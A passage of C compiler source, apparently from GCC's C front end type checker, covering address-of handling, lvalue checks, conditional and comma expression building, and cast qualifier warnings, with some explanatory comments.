to which the address will point. This is only needed
for function types. */
if ((DECL_P (arg) || REFERENCE_CLASS_P (arg))
&& (TREE_READONLY (arg) || TREE_THIS_VOLATILE (arg))
&& TREE_CODE (argtype) == FUNCTION_TYPE)
{
int orig_quals = TYPE_QUALS (strip_array_types (argtype));
int quals = orig_quals;
if (TREE_READONLY (arg))
quals |= TYPE_QUAL_CONST;
if (TREE_THIS_VOLATILE (arg))
quals |= TYPE_QUAL_VOLATILE;
argtype = c_build_qualified_type (argtype, quals);
}
switch (TREE_CODE (arg))
{
case COMPONENT_REF:
if (DECL_C_BIT_FIELD (TREE_OPERAND (arg, 1)))
{
error_at (location, "cannot take address of bit-field %qD",
TREE_OPERAND (arg, 1));
return error_mark_node;
}
/* fall through */
case ARRAY_REF:
if (TYPE_REVERSE_STORAGE_ORDER (TREE_TYPE (TREE_OPERAND (arg, 0))))
{
if (!AGGREGATE_TYPE_P (TREE_TYPE (arg))
&& !VECTOR_TYPE_P (TREE_TYPE (arg)))
{
error_at (location, "cannot take address of scalar with "
"reverse storage order");
return error_mark_node;
}
if (TREE_CODE (TREE_TYPE (arg)) == ARRAY_TYPE
&& TYPE_REVERSE_STORAGE_ORDER (TREE_TYPE (arg)))
warning_at (location, OPT_Wscalar_storage_order,
"address of array with reverse scalar storage "
"order requested");
}
default:
break;
}
if (!c_mark_addressable (arg))
return error_mark_node;
gcc_assert (TREE_CODE (arg) != COMPONENT_REF
|| !DECL_C_BIT_FIELD (TREE_OPERAND (arg, 1)));
argtype = build_pointer_type (argtype);
/* ??? Cope with user tricks that amount to offsetof. Delete this
when we have proper support for integer constant expressions. */
val = get_base_address (arg);
if (val && INDIRECT_REF_P (val)
&& TREE_CONSTANT (TREE_OPERAND (val, 0)))
{
ret = fold_offsetof (arg, argtype);
goto return_build_unary_op;
}
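/* e.g. the traditional offsetof idiom "&((struct s *) 0)->member" is
recognized here and folded to an integer constant via fold_offsetof
rather than being built as a real ADDR_EXPR. */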
val = build1 (ADDR_EXPR, argtype, arg);
ret = val;
goto return_build_unary_op;
default:
gcc_unreachable ();
}
if (argtype == NULL_TREE)
argtype = TREE_TYPE (arg);
if (TREE_CODE (arg) == INTEGER_CST)
ret = (require_constant_value
? fold_build1_initializer_loc (location, code, argtype, arg)
: fold_build1_loc (location, code, argtype, arg));
else
ret = build1 (code, argtype, arg);
return_build_unary_op:
gcc_assert (ret != error_mark_node);
if (TREE_CODE (ret) == INTEGER_CST && !TREE_OVERFLOW (ret)
&& !(TREE_CODE (xarg) == INTEGER_CST && !TREE_OVERFLOW (xarg)))
ret = build1 (NOP_EXPR, TREE_TYPE (ret), ret);
else if (TREE_CODE (ret) != INTEGER_CST && int_operands)
ret = note_integer_operands (ret);
if (eptype)
ret = build1 (EXCESS_PRECISION_EXPR, eptype, ret);
protected_set_expr_location (ret, location);
return ret;
}
/* Return true if REF is an lvalue valid for this language.
Lvalues can be assigned, unless their type has TYPE_READONLY.
Lvalues can have their address taken, unless they have C_DECL_REGISTER. */
bool
lvalue_p (const_tree ref)
{
const enum tree_code code = TREE_CODE (ref);
switch (code)
{
case REALPART_EXPR:
case IMAGPART_EXPR:
case COMPONENT_REF:
return lvalue_p (TREE_OPERAND (ref, 0));
case C_MAYBE_CONST_EXPR:
return lvalue_p (TREE_OPERAND (ref, 1));
case COMPOUND_LITERAL_EXPR:
case STRING_CST:
return true;
case INDIRECT_REF:
case ARRAY_REF:
case VAR_DECL:
case PARM_DECL:
case RESULT_DECL:
case ERROR_MARK:
return (TREE_CODE (TREE_TYPE (ref)) != FUNCTION_TYPE
&& TREE_CODE (TREE_TYPE (ref)) != METHOD_TYPE);
case BIND_EXPR:
return TREE_CODE (TREE_TYPE (ref)) == ARRAY_TYPE;
default:
return false;
}
}
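/* Note that string literals and compound literals are lvalues in C,
so both &"abc" and &(int){ 0 } are accepted, while an expression of
function type such as "*fp" is rejected by the FUNCTION_TYPE check
above. */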
/* Give a warning for storing in something that is read-only in GCC
terms but not const in ISO C terms. */
static void
readonly_warning (tree arg, enum lvalue_use use)
{
switch (use)
{
case lv_assign:
warning (0, "assignment of read-only location %qE", arg);
break;
case lv_increment:
warning (0, "increment of read-only location %qE", arg);
break;
case lv_decrement:
warning (0, "decrement of read-only location %qE", arg);
break;
default:
gcc_unreachable ();
}
return;
}
/* Return nonzero if REF is an lvalue valid for this language;
otherwise, print an error message and return zero. USE says
how the lvalue is being used and so selects the error message.
LOCATION is the location at which any error should be reported. */
static int
lvalue_or_else (location_t loc, const_tree ref, enum lvalue_use use)
{
int win = lvalue_p (ref);
if (!win)
lvalue_error (loc, use);
return win;
}
/* Mark EXP saying that we need to be able to take the
address of it; it should not be allocated in a register.
Returns true if successful. ARRAY_REF_P is true if this
is for ARRAY_REF construction - in that case we don't want
to look through VIEW_CONVERT_EXPR from VECTOR_TYPE to ARRAY_TYPE,
it is fine to use ARRAY_REFs for vector subscripts on vector
register variables. */
bool
c_mark_addressable (tree exp, bool array_ref_p)
{
tree x = exp;
while (1)
switch (TREE_CODE (x))
{
case VIEW_CONVERT_EXPR:
if (array_ref_p
&& TREE_CODE (TREE_TYPE (x)) == ARRAY_TYPE
&& VECTOR_TYPE_P (TREE_TYPE (TREE_OPERAND (x, 0))))
return true;
/* FALLTHRU */
case COMPONENT_REF:
case ADDR_EXPR:
case ARRAY_REF:
case REALPART_EXPR:
case IMAGPART_EXPR:
x = TREE_OPERAND (x, 0);
break;
case COMPOUND_LITERAL_EXPR:
TREE_ADDRESSABLE (x) = 1;
TREE_ADDRESSABLE (COMPOUND_LITERAL_EXPR_DECL (x)) = 1;
return true;
case CONSTRUCTOR:
TREE_ADDRESSABLE (x) = 1;
return true;
case VAR_DECL:
case CONST_DECL:
case PARM_DECL:
case RESULT_DECL:
if (C_DECL_REGISTER (x)
&& DECL_NONLOCAL (x))
{
if (TREE_PUBLIC (x) || is_global_var (x))
{
error
("global register variable %qD used in nested function", x);
return false;
}
pedwarn (input_location, 0, "register variable %qD used in nested function", x);
}
else if (C_DECL_REGISTER (x))
{
if (TREE_PUBLIC (x) || is_global_var (x))
error ("address of global register variable %qD requested", x);
else
error ("address of register variable %qD requested", x);
return false;
}
/* FALLTHRU */
case FUNCTION_DECL:
TREE_ADDRESSABLE (x) = 1;
/* FALLTHRU */
default:
return true;
}
}
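/* e.g. "register int r; ... &r;" reaches the VAR_DECL case above and
fails with "address of register variable 'r' requested", while taking
the address of an ordinary local variable simply sets
TREE_ADDRESSABLE and returns true. */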
/* Convert EXPR to TYPE, warning about conversion problems with
constants. SEMANTIC_TYPE is the type this conversion would use
without excess precision. If SEMANTIC_TYPE is NULL, this function
is equivalent to convert_and_check. This function is a wrapper that
handles conversions that may be different than
the usual ones because of excess precision. */
static tree
ep_convert_and_check (location_t loc, tree type, tree expr,
tree semantic_type)
{
if (TREE_TYPE (expr) == type)
return expr;
/* For C11, integer conversions may have results with excess
precision. */
if (flag_isoc11 || !semantic_type)
return convert_and_check (loc, type, expr);
if (TREE_CODE (TREE_TYPE (expr)) == INTEGER_TYPE
&& TREE_TYPE (expr) != semantic_type)
{
/* For integers, we need to check the real conversion, not
the conversion to the excess precision type. */
expr = convert_and_check (loc, semantic_type, expr);
}
/* Result type is the excess precision type, which should be
large enough, so do not check. */
return convert (type, expr);
}
/* If EXPR refers to a built-in declared without a prototype returns
the actual type of the built-in and, if non-null, set *BLTIN to
a pointer to the built-in. Otherwise return the type of EXPR
and clear *BLTIN if non-null. */
static tree
type_or_builtin_type (tree expr, tree *bltin = NULL)
{
tree dummy;
if (!bltin)
bltin = &dummy;
*bltin = NULL_TREE;
tree type = TREE_TYPE (expr);
if (TREE_CODE (expr) != ADDR_EXPR)
return type;
tree oper = TREE_OPERAND (expr, 0);
if (!DECL_P (oper)
|| TREE_CODE (oper) != FUNCTION_DECL
|| !fndecl_built_in_p (oper, BUILT_IN_NORMAL))
return type;
built_in_function code = DECL_FUNCTION_CODE (oper);
if (!C_DECL_BUILTIN_PROTOTYPE (oper))
return type;
if ((*bltin = builtin_decl_implicit (code)))
type = build_pointer_type (TREE_TYPE (*bltin));
return type;
}
/* Build and return a conditional expression IFEXP ? OP1 : OP2. If
IFEXP_BCP then the condition is a call to __builtin_constant_p, and
if folded to an integer constant then the unselected half may
contain arbitrary operations not normally permitted in constant
expressions. OP1_ORIGINAL_TYPE and OP2_ORIGINAL_TYPE are the original
types of the operands, if any, and OP1_LOC and OP2_LOC their
locations. Set the location of the expression to COLON_LOC. */
tree
build_conditional_expr (location_t colon_loc, tree ifexp, bool ifexp_bcp,
tree op1, tree op1_original_type, location_t op1_loc,
tree op2, tree op2_original_type, location_t op2_loc)
{
tree type1;
tree type2;
enum tree_code code1;
enum tree_code code2;
tree result_type = NULL;
tree semantic_result_type = NULL;
tree orig_op1 = op1, orig_op2 = op2;
bool int_const, op1_int_operands, op2_int_operands, int_operands;
bool ifexp_int_operands;
tree ret;
op1_int_operands = EXPR_INT_CONST_OPERANDS (orig_op1);
if (op1_int_operands)
op1 = remove_c_maybe_const_expr (op1);
op2_int_operands = EXPR_INT_CONST_OPERANDS (orig_op2);
if (op2_int_operands)
op2 = remove_c_maybe_const_expr (op2);
ifexp_int_operands = EXPR_INT_CONST_OPERANDS (ifexp);
if (ifexp_int_operands)
ifexp = remove_c_maybe_const_expr (ifexp);
/* Promote both alternatives. */
if (TREE_CODE (TREE_TYPE (op1)) != VOID_TYPE)
op1 = default_conversion (op1);
if (TREE_CODE (TREE_TYPE (op2)) != VOID_TYPE)
op2 = default_conversion (op2);
if (TREE_CODE (ifexp) == ERROR_MARK
|| TREE_CODE (TREE_TYPE (op1)) == ERROR_MARK
|| TREE_CODE (TREE_TYPE (op2)) == ERROR_MARK)
return error_mark_node;
tree bltin1 = NULL_TREE;
tree bltin2 = NULL_TREE;
type1 = type_or_builtin_type (op1, &bltin1);
code1 = TREE_CODE (type1);
type2 = type_or_builtin_type (op2, &bltin2);
code2 = TREE_CODE (type2);
if (code1 == POINTER_TYPE && reject_gcc_builtin (op1))
return error_mark_node;
if (code2 == POINTER_TYPE && reject_gcc_builtin (op2))
return error_mark_node;
/* C90 does not permit non-lvalue arrays in conditional expressions.
In C99 they will be pointers by now. */
if (code1 == ARRAY_TYPE || code2 == ARRAY_TYPE)
{
error_at (colon_loc, "non-lvalue array in conditional expression");
return error_mark_node;
}
if ((TREE_CODE (op1) == EXCESS_PRECISION_EXPR
|| TREE_CODE (op2) == EXCESS_PRECISION_EXPR)
&& (code1 == INTEGER_TYPE || code1 == REAL_TYPE
|| code1 == COMPLEX_TYPE)
&& (code2 == INTEGER_TYPE || code2 == REAL_TYPE
|| code2 == COMPLEX_TYPE))
{
semantic_result_type = c_common_type (type1, type2);
if (TREE_CODE (op1) == EXCESS_PRECISION_EXPR)
{
op1 = TREE_OPERAND (op1, 0);
type1 = TREE_TYPE (op1);
gcc_assert (TREE_CODE (type1) == code1);
}
if (TREE_CODE (op2) == EXCESS_PRECISION_EXPR)
{
op2 = TREE_OPERAND (op2, 0);
type2 = TREE_TYPE (op2);
gcc_assert (TREE_CODE (type2) == code2);
}
}
if (warn_cxx_compat)
{
tree t1 = op1_original_type ? op1_original_type : TREE_TYPE (orig_op1);
tree t2 = op2_original_type ? op2_original_type : TREE_TYPE (orig_op2);
if (TREE_CODE (t1) == ENUMERAL_TYPE
&& TREE_CODE (t2) == ENUMERAL_TYPE
&& TYPE_MAIN_VARIANT (t1) != TYPE_MAIN_VARIANT (t2))
warning_at (colon_loc, OPT_Wc___compat,
("different enum types in conditional is "
"invalid in C++: %qT vs %qT"),
t1, t2);
}
/* Quickly detect the usual case where op1 and op2 have the same type
after promotion. */
if (TYPE_MAIN_VARIANT (type1) == TYPE_MAIN_VARIANT (type2))
{
if (type1 == type2)
result_type = type1;
else
result_type = TYPE_MAIN_VARIANT (type1);
}
else if ((code1 == INTEGER_TYPE || code1 == REAL_TYPE
|| code1 == COMPLEX_TYPE)
&& (code2 == INTEGER_TYPE || code2 == REAL_TYPE
|| code2 == COMPLEX_TYPE))
{
/* In C11, a conditional expression between a floating-point
type and an integer type should convert the integer type to
the evaluation format of the floating-point type, with
possible excess precision. */
tree eptype1 = type1;
tree eptype2 = type2;
if (flag_isoc11)
{
tree eptype;
if (ANY_INTEGRAL_TYPE_P (type1)
&& (eptype = excess_precision_type (type2)) != NULL_TREE)
{
eptype2 = eptype;
if (!semantic_result_type)
semantic_result_type = c_common_type (type1, type2);
}
else if (ANY_INTEGRAL_TYPE_P (type2)
&& (eptype = excess_precision_type (type1)) != NULL_TREE)
{
eptype1 = eptype;
if (!semantic_result_type)
semantic_result_type = c_common_type (type1, type2);
}
}
result_type = c_common_type (eptype1, eptype2);
if (result_type == error_mark_node)
return error_mark_node;
do_warn_double_promotion (result_type, type1, type2,
"implicit conversion from %qT to %qT to "
"match other result of conditional",
colon_loc);
/* If -Wsign-compare, warn here if type1 and type2 have
different signedness. We'll promote the signed to unsigned
and later code won't know it used to be different.
Do this check on the original types, so that explicit casts
will be considered, but default promotions won't. */
if (c_inhibit_evaluation_warnings == 0)
{
int unsigned_op1 = TYPE_UNSIGNED (TREE_TYPE (orig_op1));
int unsigned_op2 = TYPE_UNSIGNED (TREE_TYPE (orig_op2));
if (unsigned_op1 ^ unsigned_op2)
{
bool ovf;
/* Do not warn if the result type is signed, since the
signed type will only be chosen if it can represent
all the values of the unsigned type. */
if (!TYPE_UNSIGNED (result_type))
/* OK */;
else
{
bool op1_maybe_const = true;
bool op2_maybe_const = true;
/* Do not warn if the signed quantity is an
unsuffixed integer literal (or some static
constant expression involving such literals) and
it is non-negative. This warning requires the
operands to be folded for best results, so do
that folding in this case even without
warn_sign_compare to avoid warning options
possibly affecting code generation. */
c_inhibit_evaluation_warnings
+= (ifexp == truthvalue_false_node);
op1 = c_fully_fold (op1, require_constant_value,
&op1_maybe_const);
c_inhibit_evaluation_warnings
-= (ifexp == truthvalue_false_node);
c_inhibit_evaluation_warnings
+= (ifexp == truthvalue_true_node);
op2 = c_fully_fold (op2, require_constant_value,
&op2_maybe_const);
c_inhibit_evaluation_warnings
-= (ifexp == truthvalue_true_node);
if (warn_sign_compare)
{
if ((unsigned_op2
&& tree_expr_nonnegative_warnv_p (op1, &ovf))
|| (unsigned_op1
&& tree_expr_nonnegative_warnv_p (op2, &ovf)))
/* OK */;
else if (unsigned_op2)
warning_at (op1_loc, OPT_Wsign_compare,
"operand of %<?:%> changes signedness from "
"%qT to %qT due to unsignedness of other "
"operand", TREE_TYPE (orig_op1),
TREE_TYPE (orig_op2));
else
warning_at (op2_loc, OPT_Wsign_compare,
"operand of %<?:%> changes signedness from "
"%qT to %qT due to unsignedness of other "
"operand", TREE_TYPE (orig_op2),
TREE_TYPE (orig_op1));
}
if (!op1_maybe_const || TREE_CODE (op1) != INTEGER_CST)
op1 = c_wrap_maybe_const (op1, !op1_maybe_const);
if (!op2_maybe_const || TREE_CODE (op2) != INTEGER_CST)
op2 = c_wrap_maybe_const (op2, !op2_maybe_const);
}
}
}
}
else if (code1 == VOID_TYPE || code2 == VOID_TYPE)
{
if (code1 != VOID_TYPE || code2 != VOID_TYPE)
pedwarn (colon_loc, OPT_Wpedantic,
"ISO C forbids conditional expr with only one void side");
result_type = void_type_node;
}
else if (code1 == POINTER_TYPE && code2 == POINTER_TYPE)
{
addr_space_t as1 = TYPE_ADDR_SPACE (TREE_TYPE (type1));
addr_space_t as2 = TYPE_ADDR_SPACE (TREE_TYPE (type2));
addr_space_t as_common;
if (comp_target_types (colon_loc, type1, type2))
result_type = common_pointer_type (type1, type2);
else if (null_pointer_constant_p (orig_op1))
result_type = type2;
else if (null_pointer_constant_p (orig_op2))
result_type = type1;
else if (!addr_space_superset (as1, as2, &as_common))
{
error_at (colon_loc, "pointers to disjoint address spaces "
"used in conditional expression");
return error_mark_node;
}
else if (VOID_TYPE_P (TREE_TYPE (type1))
&& !TYPE_ATOMIC (TREE_TYPE (type1)))
{
if ((TREE_CODE (TREE_TYPE (type2)) == ARRAY_TYPE)
&& (TYPE_QUALS (strip_array_types (TREE_TYPE (type2)))
& ~TYPE_QUALS (TREE_TYPE (type1))))
warning_at (colon_loc, OPT_Wdiscarded_array_qualifiers,
"pointer to array loses qualifier "
"in conditional expression");
if (TREE_CODE (TREE_TYPE (type2)) == FUNCTION_TYPE)
pedwarn (colon_loc, OPT_Wpedantic,
"ISO C forbids conditional expr between "
"%<void *%> and function pointer");
result_type = build_pointer_type (qualify_type (TREE_TYPE (type1),
TREE_TYPE (type2)));
}
else if (VOID_TYPE_P (TREE_TYPE (type2))
&& !TYPE_ATOMIC (TREE_TYPE (type2)))
{
if ((TREE_CODE (TREE_TYPE (type1)) == ARRAY_TYPE)
&& (TYPE_QUALS (strip_array_types (TREE_TYPE (type1)))
& ~TYPE_QUALS (TREE_TYPE (type2))))
warning_at (colon_loc, OPT_Wdiscarded_array_qualifiers,
"pointer to array loses qualifier "
"in conditional expression");
if (TREE_CODE (TREE_TYPE (type1)) == FUNCTION_TYPE)
pedwarn (colon_loc, OPT_Wpedantic,
"ISO C forbids conditional expr between "
"%<void *%> and function pointer");
result_type = build_pointer_type (qualify_type (TREE_TYPE (type2),
TREE_TYPE (type1)));
}
/* Objective-C pointer comparisons are a bit more lenient. */
else if (objc_have_common_type (type1, type2, -3, NULL_TREE))
result_type = objc_common_type (type1, type2);
else
{
int qual = ENCODE_QUAL_ADDR_SPACE (as_common);
if (bltin1 && bltin2)
warning_at (colon_loc, OPT_Wincompatible_pointer_types,
"pointer type mismatch between %qT and %qT "
"of %qD and %qD in conditional expression",
type1, type2, bltin1, bltin2);
else
pedwarn (colon_loc, 0,
"pointer type mismatch in conditional expression");
result_type = build_pointer_type
(build_qualified_type (void_type_node, qual));
}
}
else if (code1 == POINTER_TYPE && code2 == INTEGER_TYPE)
{
if (!null_pointer_constant_p (orig_op2))
pedwarn (colon_loc, 0,
"pointer/integer type mismatch in conditional expression");
else
{
op2 = null_pointer_node;
}
result_type = type1;
}
else if (code2 == POINTER_TYPE && code1 == INTEGER_TYPE)
{
if (!null_pointer_constant_p (orig_op1))
pedwarn (colon_loc, 0,
"pointer/integer type mismatch in conditional expression");
else
{
op1 = null_pointer_node;
}
result_type = type2;
}
if (!result_type)
{
if (flag_cond_mismatch)
result_type = void_type_node;
else
{
error_at (colon_loc, "type mismatch in conditional expression");
return error_mark_node;
}
}
/* Merge const and volatile flags of the incoming types. */
result_type
= build_type_variant (result_type,
TYPE_READONLY (type1) || TYPE_READONLY (type2),
TYPE_VOLATILE (type1) || TYPE_VOLATILE (type2));
op1 = ep_convert_and_check (colon_loc, result_type, op1,
semantic_result_type);
op2 = ep_convert_and_check (colon_loc, result_type, op2,
semantic_result_type);
if (ifexp_bcp && ifexp == truthvalue_true_node)
{
op2_int_operands = true;
op1 = c_fully_fold (op1, require_constant_value, NULL);
}
if (ifexp_bcp && ifexp == truthvalue_false_node)
{
op1_int_operands = true;
op2 = c_fully_fold (op2, require_constant_value, NULL);
}
int_const = int_operands = (ifexp_int_operands
&& op1_int_operands
&& op2_int_operands);
if (int_operands)
{
int_const = ((ifexp == truthvalue_true_node
&& TREE_CODE (orig_op1) == INTEGER_CST
&& !TREE_OVERFLOW (orig_op1))
|| (ifexp == truthvalue_false_node
&& TREE_CODE (orig_op2) == INTEGER_CST
&& !TREE_OVERFLOW (orig_op2)));
}
/* Need to convert condition operand into a vector mask. */
if (VECTOR_TYPE_P (TREE_TYPE (ifexp)))
{
tree vectype = TREE_TYPE (ifexp);
tree elem_type = TREE_TYPE (vectype);
tree zero = build_int_cst (elem_type, 0);
tree zero_vec = build_vector_from_val (vectype, zero);
tree cmp_type = truth_type_for (vectype);
ifexp = build2 (NE_EXPR, cmp_type, ifexp, zero_vec);
}
if (int_const || (ifexp_bcp && TREE_CODE (ifexp) == INTEGER_CST))
ret = fold_build3_loc (colon_loc, COND_EXPR, result_type, ifexp, op1, op2);
else
{
if (int_operands)
{
/* Use c_fully_fold here, since C_MAYBE_CONST_EXPR might be
nested inside of the expression. */
op1 = c_fully_fold (op1, false, NULL);
op2 = c_fully_fold (op2, false, NULL);
}
ret = build3 (COND_EXPR, result_type, ifexp, op1, op2);
if (int_operands)
ret = note_integer_operands (ret);
}
if (semantic_result_type)
ret = build1 (EXCESS_PRECISION_EXPR, semantic_result_type, ret);
protected_set_expr_location (ret, colon_loc);
/* If OP1 and OP2 are the same and don't have side-effects,
warn here, because the COND_EXPR will be turned into OP1. */
if (warn_duplicated_branches
&& TREE_CODE (ret) == COND_EXPR
&& (op1 == op2 || operand_equal_p (op1, op2, 0)))
warning_at (EXPR_LOCATION (ret), OPT_Wduplicated_branches,
"this condition has identical branches");
return ret;
}
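/* Sketch of the pointer arms above: "c ? (void *) p : (int *) q"
takes the VOID_TYPE_P branch and the result has type "void *" (a
pointer to appropriately qualified void, as C11 6.5.15 requires),
while "c ? (int *) p : (long *) q" pedwarns about the pointer type
mismatch and falls back to a qualified "void *". */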
/* Return a compound expression that performs two expressions and
returns the value of the second of them.
LOC is the location of the COMPOUND_EXPR. */
tree
build_compound_expr (location_t loc, tree expr1, tree expr2)
{
bool expr1_int_operands, expr2_int_operands;
tree eptype = NULL_TREE;
tree ret;
expr1_int_operands = EXPR_INT_CONST_OPERANDS (expr1);
if (expr1_int_operands)
expr1 = remove_c_maybe_const_expr (expr1);
expr2_int_operands = EXPR_INT_CONST_OPERANDS (expr2);
if (expr2_int_operands)
expr2 = remove_c_maybe_const_expr (expr2);
if (TREE_CODE (expr1) == EXCESS_PRECISION_EXPR)
expr1 = TREE_OPERAND (expr1, 0);
if (TREE_CODE (expr2) == EXCESS_PRECISION_EXPR)
{
eptype = TREE_TYPE (expr2);
expr2 = TREE_OPERAND (expr2, 0);
}
if (!TREE_SIDE_EFFECTS (expr1))
{
/* The left-hand operand of a comma expression is like an expression
statement: with -Wunused, we should warn if it doesn't have
any side-effects, unless it was explicitly cast to (void). */
if (warn_unused_value)
{
if (VOID_TYPE_P (TREE_TYPE (expr1))
&& CONVERT_EXPR_P (expr1))
; /* (void) a, b */
else if (VOID_TYPE_P (TREE_TYPE (expr1))
&& TREE_CODE (expr1) == COMPOUND_EXPR
&& CONVERT_EXPR_P (TREE_OPERAND (expr1, 1)))
; /* (void) a, (void) b, c */
else
warning_at (loc, OPT_Wunused_value,
"left-hand operand of comma expression has no effect");
}
}
else if (TREE_CODE (expr1) == COMPOUND_EXPR
&& warn_unused_value)
{
tree r = expr1;
location_t cloc = loc;
while (TREE_CODE (r) == COMPOUND_EXPR)
{
if (EXPR_HAS_LOCATION (r))
cloc = EXPR_LOCATION (r);
r = TREE_OPERAND (r, 1);
}
if (!TREE_SIDE_EFFECTS (r)
&& !VOID_TYPE_P (TREE_TYPE (r))
&& !CONVERT_EXPR_P (r))
warning_at (cloc, OPT_Wunused_value,
"right-hand operand of comma expression has no effect");
}
/* With -Wunused, we should also warn if the left-hand operand does have
side-effects, but computes a value which is not used. For example, in
`foo() + bar(), baz()' the result of the `+' operator is not used,
so we should issue a warning. */
else if (warn_unused_value)
warn_if_unused_value (expr1, loc);
if (expr2 == error_mark_node)
return error_mark_node;
ret = build2 (COMPOUND_EXPR, TREE_TYPE (expr2), expr1, expr2);
if (flag_isoc99
&& expr1_int_operands
&& expr2_int_operands)
ret = note_integer_operands (ret);
if (eptype)
ret = build1 (EXCESS_PRECISION_EXPR, eptype, ret);
protected_set_expr_location (ret, loc);
return ret;
}
/* Issue -Wcast-qual warnings when appropriate. TYPE is the type to
which we are casting. OTYPE is the type of the expression being
cast. Both TYPE and OTYPE are pointer types. LOC is the location
of the cast. This is only called when -Wcast-qual appeared on the
command line. Named address space qualifiers are not handled here,
because they result in different warnings. */
static void
handle_warn_cast_qual (location_t loc, tree type, tree otype)
{
tree in_type = type;
tree in_otype = otype;
int added = 0;
int discarded = 0;
bool is_const;
/* Check that the qualifiers on IN_TYPE are a superset of the
qualifiers of IN_OTYPE. The outermost level of POINTER_TYPE
nodes is uninteresting and we stop as soon as we hit a
non-POINTER_TYPE node on either type. */
do
{
in_otype = TREE_TYPE (in_otype);
in_type = TREE_TYPE (in_type);
/* GNU C allows cv-qualified function types. 'const' means the
function is very pure, 'volatile' means it can't return. We
need to warn when such qualifiers are added, not when they're
taken away. */
if (TREE_CODE (in_otype) == FUNCTION_TYPE
&& TREE_CODE (in_type) == FUNCTION_TYPE)
added |= (TYPE_QUALS_NO_ADDR_SPACE (in_type)
& ~TYPE_QUALS_NO_ADDR_SPACE (in_otype));
else
discarded |= (TYPE_QUALS_NO_ADDR_SPACE (in_otype)
& ~TYPE_QUALS_NO_ADDR_SPACE (in_type));
}
while (TREE_CODE (in_type) == POINTER_TYPE
&& TREE_CODE (in_otype) == POINTER_TYPE);
if (added)
warning_at (loc, OPT_Wcast_qual,
"cast adds %q#v qualifier to function type", added);
if (discarded)
/* There are qualifiers present in IN_OTYPE that are not present
in IN_TYPE. */
warning_at (loc, OPT_Wcast_qual,
"cast discards %qv qualifier from pointer target type",
discarded);
if (added || discarded)
return;
/* A cast from **T to const **T is unsafe, because it can cause a
const value to be changed with no additional warning. We only
issue this warning if T is the same on both sides, and we only
issue the warning if there are the same number of pointers on
both sides, as otherwise the cast is clearly unsafe anyhow. A
cast is unsafe when a qualifier is added at one level and const
is not present at all outer levels.
To issue this warning, we check at each level whether the cast
adds new qualifiers not already seen. We don't need to special
case function types, as they won't have the same
TYPE_MAIN_VARIANT. */
if (TYPE_MAIN_VARIANT (in_type) != TYPE_MAIN_VARIANT (in_otype))
return;
if (TREE_CODE (TREE_TYPE (type)) != POINTER_TYPE)
return;
in_type = type;
in_otype = otype;
is_const = TYPE_READONLY (TREE_TYPE (in_type));
do
{
in_type = TREE_TYPE (in_type);
in_otype = TREE_TYPE (in_otype);
if ((TYPE_QUALS (in_type) &~ TYPE_QUALS (in_otype)) != 0
&& !is_const)
{
warning_at (loc, OPT_Wcast_qual,
"to be safe all intermediate pointers in cast from "
"%qT to %qT must be %<const%> qualified",
otype, type);
break;
}
if (is_const)
is_const = TYPE_READONLY (in_type);
}
while (TREE_CODE (in_type) == POINTER_TYPE);
}
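/* Classic instance of the multi-level check above (a sketch):
char *p;
const char **q = (const char **) &p;
warns, because after the cast "*q = some_const_string; *p = 'x';"
would modify const data without any further diagnostic; the cast is
only safe with a const-qualified intermediate pointer, as in
"const char *const *". */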
/* Heuristic check if two parameter types can be considered ABI-equivalent. */
static bool
c_safe_arg_type_equiv_p (tree t1, tree t2)
{
t1 = TYPE_MAIN_VARIANT (t1);
t2 = TYPE_MAIN_VARIANT (t2);
if (TREE_CODE (t1) == POINTER_TYPE
&& TREE_CODE (t2) == POINTER_TYPE)
return true;
/* The signedness of the parameter matters only when an integral
type smaller than int is promoted to int, otherwise only the
precision of the parameter matters.
This check should make sure that the callee does not see
undefined values in argument registers. */
if (INTEGRAL_TYPE_P (t1)
&& INTEGRAL_TYPE_P (t2)
&& TYPE_PRECISION (t1) == TYPE_PRECISION (t2)
&& (TYPE_UNSIGNED (t1) == TYPE_UNSIGNED (t2)
|| !targetm.calls.promote_prototypes (NULL_TREE)
|| TYPE_PRECISION (t1) >= TYPE_PRECISION (integer_type_node)))
return true;
return comptypes (t1, t2);
}
/* Check if a type cast between two function types can be considered safe. */
static bool
c_safe_function_type_cast_p (tree t1, tree t2)
{
if (TREE_TYPE (t1) == void_type_node &&
TYPE_ARG_TYPES (t1) == void_list_node)
return true;
if (TREE_TYPE (t2) == void_type_node &&
TYPE_ARG_TYPES (t2) == void_list_node)
return true;
if (!c_safe_arg_type_equiv_p (TREE_TYPE (t1), TREE_TYPE (t2)))
return false;
for (t1 = TYPE_ARG_TYPES (t1), t2 = TYPE_ARG_TYPES (t2);
t1 && t2;
t1 = TREE_CHAIN (t1), t2 = TREE_CHAIN (t2))
if (!c_safe_arg_type_equiv_p (TREE_VALUE (t1), TREE_VALUE (t2)))
return false;
return true;
}
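/* E.g. (hypothetical): casting 'void (*)(int *)' to 'void (*)(char *)'
is deemed safe by the pointer rule in c_safe_arg_type_equiv_p, while
casting 'int (*)(int)' to 'int (*)(double)' is not and is diagnosed
with -Wcast-function-type in build_c_cast below.  */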
/* Build an expression representing a cast to type TYPE of expression EXPR.
LOC is the location of the cast, typically the open paren of the cast. */
tree
build_c_cast (location_t loc, tree type, tree expr)
{
tree value;
bool int_operands = EXPR_INT_CONST_OPERANDS (expr);
if (TREE_CODE (expr) == EXCESS_PRECISION_EXPR)
expr = TREE_OPERAND (expr, 0);
value = expr;
if (int_operands)
value = remove_c_maybe_const_expr (value);
if (type == error_mark_node || expr == error_mark_node)
return error_mark_node;
/* The ObjC front-end uses TYPE_MAIN_VARIANT to tie together types differing
only in <protocol> qualifications. But when constructing cast expressions,
the protocols do matter and must be kept around. */
if (objc_is_object_ptr (type) && objc_is_object_ptr (TREE_TYPE (expr)))
return build1 (NOP_EXPR, type, expr);
type = TYPE_MAIN_VARIANT (type);
if (TREE_CODE (type) == ARRAY_TYPE)
{
error_at (loc, "cast specifies array type");
return error_mark_node;
}
if (TREE_CODE (type) == FUNCTION_TYPE)
{
error_at (loc, "cast specifies function type");
return error_mark_node;
}
if (!VOID_TYPE_P (type))
{
value = require_complete_type (loc, value);
if (value == error_mark_node)
return error_mark_node;
}
if (type == TYPE_MAIN_VARIANT (TREE_TYPE (value)))
{
if (RECORD_OR_UNION_TYPE_P (type))
pedwarn (loc, OPT_Wpedantic,
"ISO C forbids casting nonscalar to the same type");
/* Convert to remove any qualifiers from VALUE's type. */
value = convert (type, value);
}
else if (TREE_CODE (type) == UNION_TYPE)
{
tree field;
for (field = TYPE_FIELDS (type); field; field = DECL_CHAIN (field))
if (TREE_TYPE (field) != error_mark_node
